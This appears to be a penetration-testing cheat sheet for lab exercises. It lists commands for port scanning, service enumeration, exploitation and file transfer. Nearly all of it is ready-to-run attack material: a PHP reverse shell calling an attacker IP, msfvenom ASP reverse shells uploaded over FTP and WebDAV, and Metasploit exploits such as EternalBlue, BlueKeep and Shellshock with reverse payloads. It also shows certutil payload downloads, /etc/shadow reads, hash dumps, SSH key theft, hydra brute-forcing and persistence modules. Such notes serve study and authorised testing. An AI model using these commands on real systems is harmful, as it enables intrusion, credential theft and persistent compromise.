## Scanning

### Port Scanning with Nmap — Nmap

- **Tools:** Nmap
- **Commands:**

```
# Basic Scan
nmap <target>

# Service and Version Detection
nmap -sV <target>

# OS Detection
nmap -O <target>

# All Ports Scan
nmap -p- <target>

# Common Scripts Scan
nmap -sC <target>

# Aggressive Scan
nmap -A <target>
```

---

## Enumeration

### FTP Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
nmap -p 21 --script ftp-anon <TARGET_IP>
nmap -p 21 --script ftp-brute --script-args userdb=<USERS_LIST> <TARGET_IP>
```

- **Note:**

### HTTP Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
nmap -p 80 --script=http-enum -sV <TARGET_IP>
nmap -p 80 --script=http-headers -sV <TARGET_IP>
nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ <TARGET_IP>
```

### HTTP Enum — Manual

- **Tools:** Manual
- **Commands:**

```
whatweb <TARGET_IP>
http <TARGET_IP>
browsh --startup-url http://<TARGET_IP>

wget <TARGET_IP>
curl <TARGET_IP> | more
curl -I http://<TARGET_IP>/<DIR>
curl --digest -u <USER>:<PW> http://<TARGET_IP>/<DIR>

lynx <TARGET_IP>
```

### HTTP Enum — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/robots_txt
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_version
```

### HTTP Enum — dirb

- **Tools:** dirb
- **Commands:**

```
dirb http://<TARGET_IP>
dirb http://<TARGET_IP> /usr/share/metasploit-framework/data/wordlists/directory.txt
```

### SMB Enum — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor
```

### SMB Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
nmap -p 445 --script smb-protocols <TARGET_IP>
nmap -p 445 --script smb-security-mode <TARGET_IP>

nmap -p 445 --script smb-enum-sessions <TARGET_IP>
nmap -p 445 --script smb-enum-sessions --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-shares <TARGET_IP>
nmap -p 445 --script smb-enum-shares --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-users --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-server-stats --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-domains--script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-groups--script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-services --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=<USER>,smbpassword=<PW> <TARGET_IP>

nmap -p 445 --script smb-os-discovery <TARGET_IP>

nmblookup -A <TARGET_IP>
```

### SMB Enum — smbclient

- **Tools:** smbclient
- **Commands:**

```
# SMB Connection
smbclient -L <TARGET_IP> -N
smbclient -L <TARGET_IP> -U <USER>
smbclient //<TARGET_IP>/<USER> -U <USER>
smbclient //<TARGET_IP>/admin -U admin
smbclient //<TARGET_IP>/public -N
## SMBCLIENT
help
ls
get <filename>

rpcclient -U "" -N <TARGET_IP>
## RPCCLIENT
enumdomusers
enumdomgroups
lookupnames admin
```

### SMB Enum — enum4linux

- **Tools:** enum4linux
- **Commands:**

```
# ENUM4LINUX
enum4linux -o <TARGET_IP>
enum4linux -U <TARGET_IP>
enum4linux -S <TARGET_IP>
enum4linux -G <TARGET_IP>
enum4linux -i <TARGET_IP>
enum4linux -r -u "<USER>" -p "<PW>" <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>
```

### SMB Enum — SMBMAP

- **Tools:** SMBMAP
- **Commands:**

```
smbmap -u guest -p "" -d . -H <TARGET_IP>

smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP>

## Run a command
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\\flag.txt'
```

### SMTP Enum — smtp-user-enum

- **Tools:** smtp-user-enum
- **Commands:**

```
smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t <TARGET_IP>
```

### SMTP Enum — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
use auxiliary/scanner/smtp/smtp_enum
```

### SMTP Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
sudo nmap -p 25 -sV -sC -O <TARGET_IP>

nmap -sV -script banner <TARGET_IP>
```

### SMTP Enum — Manual

- **Tools:** Manual
- **Commands:**

```
nc <TARGET_IP> 25
telnet <TARGET_IP> 25

# TELNET client - check supported capabilities
HELO [attacker.xyz](http://attacker.xyz)
EHLO [attacker.xyz](http://attacker.xyz)
```

### SQL Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
# NMAP
sudo nmap -p 3306 -sV -O <TARGET_IP>

nmap -p 3306 --script=mysql-empty-password <TARGET_IP>
nmap -p 3306 --script=mysql-info <TARGET_IP>
nmap -p 3306 --script=mysql-users --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP>
nmap -p 3306 --script=mysql-databases --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP>
nmap -p 3306 --script=mysql-variables --script-args="mysqluser='<USER>',mysqlpass='<PW>'" <TARGET_IP>

nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='<USER>',mysql-audit.password='<PW>',mysql-audit.filename=''" <TARGET_IP>

nmap -p 3306 --script=mysql-dump-hashes --script-args="username='<USER>',password='<PW>'" <TARGET_IP>

nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from <DB_NAME>.<TABLE_NAME>;',username='<USER>',password='<PW>'" <TARGET_IP>

## Microsoft SQL
nmap -sV -sC -p 1433 <TARGET_IP>

nmap -p 1433 --script ms-sql-info <TARGET_IP>
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 <TARGET_IP>
nmap -p 1433 --script ms-sql-empty-password <TARGET_IP>

nmap -p 3306 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt <TARGET_IP>

nmap -p 3306 --script ms-sql-query --script-args mssql.username=<USER>,mssql.password=<PW>,ms-sql-query.query="SELECT * FROM master..syslogins" <TARGET_IP> -oN output.txt

nmap -p 3306 --script ms-sql-dump-hashes --script-args mssql.username=<USER>,mssql.password=<PW> <TARGET_IP>

nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=<USER>,mssql.password=<PW>,ms-sql-xp-cmdshell.cmd="ipconfig" <TARGET_IP>

nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=<USER>,mssql.password=<PW>,ms-sql-xp-cmdshell.cmd="type c:\\flag.txt" <TARGET_IP>
```

### SQL Enum — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
# METASPLOIT MYSQL
use auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_writable_dirs
use auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_login

## MS Sql
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_exec
use auxiliary/admin/mssql/mssql_enum_domain_accounts
```

### SQL Enum — MySQL client

- **Tools:** MYSQL
- **Commands:**

```
mysql -h <TARGET_IP> -u <USER>
mysql -h <TARGET_IP> -u root

# Mysql client
help
show databases;
use <DB_NAME>;
select count(*) from <TABLE_NAME>;
select load_file("/etc/shadow");
```

### SSH Enum — Nmap

- **Tools:** Nmap
- **Commands:**

```
nmap -p 22 --script ssh2-enum-algos <TARGET_IP>
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full <TARGET_IP>
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<USER>" <TARGET_IP>

nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=<USER>, ssh-run.password=<PW>" <TARGET_IP>

nmap -p 22 --script=ssh-brute --script-args userdb=<USERS_LIST> <TARGET_IP>
```

### Web App Enum — Nikto

- **Tools:** Nikto
- **Commands:**

```
nikto -h http://<TARGET_IP> -o niktoscan.txt

nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm
```

### Web App Enum — WMAP

- **Tools:** WMAP, Metasploit
- **Commands:**

```
load wmap
wmap_sites -a <TARGET_IP>
wmap_sites -l
wmap_targets -t <URL>
wmap_targets -l

wmap_run -t
wmap_run -e
wmap_vulns -l
```

### Web App Enum — Gobuster

- **Tools:** Gobuster
- **Commands:**

```
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404 -x .php,.xml,.txt -r
```

### Web App Enum — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
use auxiliary/scanner/http/apache_userdir_enum
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/robots_txt
```

### Web App Enum (Win WebDAV) — davtest, cadaver

- **Tools:** davtest, cadaver
- **Commands:**

```
davtest -url <URL>
davtest -auth <USER>:<PW> -url http://<TARGET_IP>/webdav

cadaver [OPTIONS] <URL>
```

---

## Exploitation

### Linux FTP — Manual • FTP • Hydra • netcat

- **Tools:** Manual, FTP, Hydra, netcat
- **Commands:**

```
Manual — connect to FTP server (test/anon).

ftp <TARGET_IP>
Manual — list nmap scripts to find ftp scripts.

ls -lah /usr/share/nmap/scripts | grep ftp-*
Manual — try anonymous login.

ftp <TARGET_IP>
Manual — upload a PHP webshell via FTP (prepare/modify first).

cp /usr/share/webshells/php/php-reverse-shell.php .

mv php-reverse-shell.php shell.php
edit shell.php to set attacker IP/port
ftp <TARGET_IP>

cd /var/www/dav

put shell.php
Manual — start listener to catch reverse shell.

nc -nvlp <PORT>
Manual — brute-force FTP with hydra.

hydra -l <USER> -P /usr/share/metasploit-framework/data/wordlists/unix_users.txt <TARGET_IP> ftp
Manual — exploit vsftpd backdoor (example via Searchsploit mirror).

searchsploit vsftpd

searchsploit -m 49757

chmod +x [49757.py](http://49757.py)

python3 [49757.py](http://49757.py) <TARGET_IP>
```

### Linux FTP — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Metasploit — FTP brute-force module usage.
use auxiliary/scanner/ftp/ftp_login
set RHOSTS <TARGET_IP>
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run
```

### Linux PHP / CGI — Manual

- **Tools:** Manual
- **Commands:**

```
Manual — scan HTTP service.

nmap -sV -sC -p 80 <TARGET_IP>
Manual — check for phpinfo pages.

http://<TARGET_IP>/phpinfo.php
Manual — exploit PHP-CGI (SearchSploit example).

searchsploit php cgi

searchsploit -m 18836

python2 [18836.py](http://18836.py) <TARGET_IP> 80
Manual — create a simple PHP reverse shell payload.
pwn_code = "<?php \$sock=fsockopen('<ATTACKER_IP>',<PORT>);exec('/bin/sh -i <&4 >&4 2>&4');?>"
Manual — listener for PHP reverse shell.

nc -nvlp <PORT>
```

### Linux PHP / CGI — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Metasploit — use any available PHP-CGI or related modules (example).

use exploit/multi/http/php_cgi_arg_injection (if applicable)

set RHOSTS <TARGET_IP>

set TARGETURI /path

set payload linux/x86/meterpreter_reverse_tcp

set LHOST <LOCAL_IP>

set LPORT <LOCAL_PORT>

run
```

### Linux Samba / SMB — Manual

- **Tools:** smbclient, enum4linux, Hydra, netcat
- **Commands:**

```
Manual — list SMB shares via smbclient.
smbclient -L <TARGET_IP> -U <USER>

Manual — enumerate SMB shares/files with smbmap.
smbmap -u <USER> -p '<PW>' -H <TARGET_IP>

Manual — full enum with enum4linux.
enum4linux -a <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>

Manual — hydra SMB brute-force example.
hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP> smb

Manual — netcat TCP connect to SMB port (quick check).
nc -nv <TARGET_IP> 445

Metasploit — SMB version scanner.
use auxiliary/scanner/smb/smb_version
setg RHOSTS <TARGET_IP>
run
```

### Linux Samba / SMB — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Metasploit — SMB version scanner.

use auxiliary/scanner/smb/smb_version

setg RHOSTS <TARGET_IP>

run
Metasploit — SMB login scanner (auxiliary).

use auxiliary/scanner/smb/smb_login

set RHOSTS <TARGET_IP>

set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

run
Metasploit — Samba usermap_script exploit.

use exploit/multi/samba/usermap_script

setg RHOSTS <TARGET_IP>

run
Metasploit — known-pipename Samba exploit.

use exploit/linux/samba/is_known_pipename

set RHOSTS <TARGET_IP>

run
```

### Linux Shell Shock — Metasploit • Nmap

- **Tools:** Metasploit, Nmap
- **Commands:**

```
nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET_IP>

Metasploit — exploit Apache CGI Bash env (Shellshock).
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set TARGETURI /gettime.cgi
exploit
```

### Linux SMTP — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
use msf auxiliary to enumerate SMTP users.
use auxiliary/scanner/smtp/smtp_enum
setg RHOSTS <TARGET_IP>
set UNIXONLY true
run
Metasploit — exploit Haraka SMTP module example (non-staged payload).
use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to root@attackdefense.test
```

### Linux SSH — Hydra • SSH

- **Tools:** Hydra, SSH
- **Commands:**

```
Manual — normal SSH login.
ssh <USER>@<TARGET_IP>

Manual — brute-force SSH with hydra.
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/common_passwords.txt -t 4 <TARGET_IP> ssh
```

### Linux SSH — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Metasploit — SSH login scanner (auxiliary).
use auxiliary/scanner/ssh/ssh_login
setg RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PW>
run

Metasploit — libssh auth bypass scanner (auxiliary).
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS <TARGET_IP>
set SPAWN_PTY true
run
```

### Linux VSFTPD — FTP • Nmap • Searchsploit

- **Tools:** FTP, Nmap, Searchsploit
- **Commands:**

```
Manual — scan FTP service.
nmap -sV -sC -p 21 <TARGET_IP>

Manual — try anonymous FTP.
ftp <TARGET_IP>

Manual — exploit vsftpd via SearchSploit exploit script (mirror/run).
searchsploit vsftpd
searchsploit -m <id>
python3 <exploit_[script.py](http://script.py)> <TARGET_IP>
```

### Windows FTP — Manual

- **Tools:** Manual
- **Commands:**

```
Scan FTP + HTTP.
nmap -sV -sC -p21,80 <TARGET_IP>

Test anonymous FTP.
ftp <TARGET_IP>

Brute-force FTP.
hydra -L <userlist> -P <passlist> <TARGET_IP> ftp

Upload ASPX reverse shell.
msfvenom -p windows/shell/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f asp > shell.aspx
ftp <TARGET_IP>
put shell.aspx

Trigger via browser.
http://<TARGET_IP>/shell.aspx
```

### Windows IIS / WebDAV — Manual

- **Tools:** Manual
- **Commands:**

```
Test WebDAV methods (no auth).

davtest -url <URL>
Test WebDAV with basic auth.

davtest -auth <USER>:<PW> -url http://<TARGET_IP>/webdav
Interact with WebDAV server.

cadaver <URL>
Enumerate web paths on HTTP.

nmap -p 80 --script http-enum -sV <TARGET_IP>
Create an ASP reverse payload.

msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f asp > shell.asp
Upload ASP shell via WebDAV or FTP.

cadaver http://<TARGET_IP>/webdav

put shell.asp
Trigger shell via browser.

http://<TARGET_IP>/webdav/shell.asp
```

### Windows IIS / WebDAV — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
use exploit/windows/iis/iis_webdav_upload_asp
set HttpUsername <USER>
set HttpPassword <PW>
set PATH /webdav/metasploit.asp
run
```

### Windows RDP — Manual

- **Tools:** Manual
- **Commands:**

```
Connect to RDP.
xfreerdp /u:<USER> /p:<PW> /v:<TARGET_IP>:3389

Brute-force RDP.
hydra -L <users> -P <passes> rdp://<TARGET_IP> -s 3389
```

### Windows RDP — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
RDP / BlueKeep
Check BlueKeep.

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

set RHOSTS <TARGET_IP>

run
Exploit BlueKeep.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set RHOSTS <TARGET_IP>

show targets

set target <NUMBER>

run
```

### Windows SMB — Manual

- **Tools:** Manual
- **Commands:**

```
hydra -l <USER> -P <passlist> <TARGET_IP> smb

List SMB shares.
smbclient -L <TARGET_IP> -U <USER>

Enumerate SMB shares/files.
smbmap -u <USER> -p <PW> -H <TARGET_IP>

Enum4linux enumeration (SMB/NetBIOS).
enum4linux -u <USER> -p <PW> -U <TARGET_IP>

Run impacket psexec script.
python3 [psexec.py](http://psexec.py) <USER>@<TARGET_IP>
```

### Windows SMB — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Use SMB login scanner.
use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USER_FILE <users>
set PASS_FILE <passwords>
run

Exploit MS17-010 (EternalBlue).
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
run

PsExec exploit (requires creds).
use exploit/windows/smb/psexec
set RHOSTS <TARGET_IP>
set SMBUser <USER>
set SMBPass <PW>
set payload windows/x64/meterpreter/reverse_tcp
run
```

### Windows Tomcat — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Tomcat
Tomcat JSP upload exploit.

use exploit/multi/http/tomcat_jsp_upload_bypass

set payload java/jsp_shell_bind_tcp

set SHELL cmd

run
```

### Windows WinRM — Manual

- **Tools:** Manual
- **Commands:**

```
Test WinRM credentials.
crackmapexec winrm <TARGET_IP> -u <USER> -p <PW>

Interactive WinRM shell.
evil-winrm -i <TARGET_IP> -u <USER> -p <PASSWORD>
```

### Windows WinRM — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
WinRM brute-force.

use auxiliary/scanner/winrm/winrm_login

set RHOSTS <TARGET_IP>

set USER_FILE <users>

set PASS_FILE <passwords>

run
WinRM script execution.

use exploit/windows/winrm/winrm_script_exec

set USERNAME <USER>

set PASSWORD <PW>

set FORCE_VBS true

run
```

---

## File Transfer

### Linux File Transfer — Manual

- **Tools:** Manual
- **Commands:**

```
Simple HTTP download from attacker to target

python3 -m http.server <PORT>  (attacker)

wget http://<ATTACKER_IP>:<PORT>/file -O file
Python2 HTTP server fallback

python -m SimpleHTTPServer <PORT>
SCP download (if key available)

scp <USER>@<TARGET_IP>:~/.ssh/id_rsa .
Make SSH key usable

chmod 400 id_rsa

ssh -i id_rsa <USER>@<TARGET_IP>
Use certutil for downloading on Windows-compatible targets (if applicable)

certutil -urlcache -f http://<ATTACKER>/payload payload.exe  (Windows-specific)
Use tmux for persistent shells on target

apt install tmux -y

tmux new -s session
Use nc for simple transfer / listener
attacker: nc -nvlp <PORT>
target: nc <ATTACKER_IP> <PORT> > file
```

### Linux File Transfer — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Upload via Meterpreter

upload <local> <remote>  (within a meterpreter session)
Use post modules that create persistent SSH keys

use post/linux/manage/sshkey_persistence

set SESSION <ID>

run
```

### Windows File Transfer — Metasploit

- **Tools:** Metasploit
- **Commands:**

```
Upload file via Meterpreter

upload /local/path/C2.exe C:\Temp\C2.exe
Download file from target via Meterpreter

download C:\path\to\file C:\local\path
Use msf module that stages payloads / persistence scripts

use exploit/windows/local/persistence_service

set payload windows/meterpreter/reverse_tcp

set SESSION <ID>

run
Use multi/handler to receive uploaded payload callbacks

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST <LOCAL_HOST>

set LPORT <LOCAL_PORT>

run
```

### Windows File Transfer — Manual

- **Tools:** Manual
- **Commands:**